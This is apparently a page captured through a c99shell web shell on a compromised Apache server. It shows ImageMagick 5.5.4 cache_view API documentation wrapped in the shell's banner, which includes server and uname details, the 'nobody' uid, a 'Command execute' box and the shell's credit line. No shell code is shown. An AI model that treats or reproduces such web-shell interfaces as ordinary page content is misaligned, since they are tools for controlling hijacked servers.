Software: Apache/2.0.54 (Unix) mod_perl/1.99_09 Perl/v5.8.0 mod_ssl/2.0.54 OpenSSL/0.9.7l DAV/2 FrontPage/5.0.2.2635 PHP/4.4.0 mod_gzip/2.0.26.1a uname -a: Linux snow.he.net 4.4.276-v2-mono-1 #1 SMP Wed Jul 21 11:21:17 PDT 2021 i686 uid=99(nobody) gid=98(nobody) groups=98(nobody) Safe-mode: OFF (not secure) /usr/doc/ImageMagick-5.5.4-3/api/ drwxr-xr-x | |
| Viewing file: Select action/file-type:
NAMEcache_view - Working with Cache Views
SYNOPSISconst PixelPacket * AcquireCacheView( const ViewInfo *view, const long x, const long y, const unsigned long columns, const unsigned long rows, ExceptionInfo *exception ); void CloseCacheView( ViewInfo *view ); PixelPacket * GetCacheView( ViewInfo *view, const long x, const long y, const unsigned long columns, const unsigned long rows ); IndexPacket * GetCacheViewIndexes( const ViewInfo *view ); PixelPacket * GetCacheViewPixels( const ViewInfo *view ); ViewInfo * OpenCacheView( Image *image ); PixelPacket * SetCacheView( ViewInfo *view, const long x, const long y, const unsigned long columns, const unsigned long rows ); unsigned int SyncCacheView( ViewInfo *view );
FUNCTION DESCRIPTIONS
AcquireCacheViewMethod AcquireCacheView gets pixels from the in-memory or disk pixel cache as defined by the geometry parameters. A pointer to the pixels is returned if the pixels are transferred, otherwise a NULL is returned. The format of the AcquireCacheView method is: const PixelPacket *AcquireCacheView ( const ViewInfo *view, const long x, const long y, const unsigned long columns, const unsigned long rows, ExceptionInfo *exception ); A description of each parameter follows:
CloseCacheViewCloseCacheView() closes the specified view returned by a previous call to OpenCacheView ( ) . The format of the CloseCacheView method is: void CloseCacheView ( ViewInfo *view ); A description of each parameter follows:
GetCacheViewGetCacheView() gets pixels from the in-memory or disk pixel cache as defined by the geometry parameters. A pointer to the pixels is returned if the pixels are transferred, otherwise a NULL is returned. The format of the GetCacheView method is: PixelPacket *GetCacheView ( ViewInfo *view, const long x, const long y, const unsigned long columns, const unsigned long rows ); A description of each parameter follows:
GetCacheViewIndexesMethod GetCacheViewIndexes returns the indexes associated with the specified view. The format of the GetCacheViewIndexes method is: IndexPacket *GetCacheViewIndexes ( const ViewInfo *view ); A description of each parameter follows:
GetCacheViewPixelsGetCacheViewPixels() returns the pixels associated with the specified specified view. The format of the GetCacheViewPixels method is: PixelPacket *GetCacheViewPixels ( const ViewInfo *view ); A description of each parameter follows:
OpenCacheViewOpenCacheView() opens a view into the pixel cache. The format of the OpenCacheView method is: ViewInfo *OpenCacheView ( Image *image ); A description of each parameter follows:
SetCacheViewSetCacheView() gets pixels from the in-memory or disk pixel cache as defined by the geometry parameters. A pointer to the pixels is returned if the pixels are transferred, otherwise a NULL is returned. The format of the SetCacheView method is: PixelPacket *SetCacheView ( ViewInfo *view, const long x, const long y, const unsigned long columns, const unsigned long rows ); A description of each parameter follows:
SyncCacheViewSyncCacheView() saves the view pixels to the in-memory or disk cache. The method returns True if the pixel region is synced, otherwise False. The format of the SyncCacheView method is: unsigned int SyncCacheView ( ViewInfo *view ); A description of each parameter follows:
|
:: Command execute :: | |
--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0286 ]-- |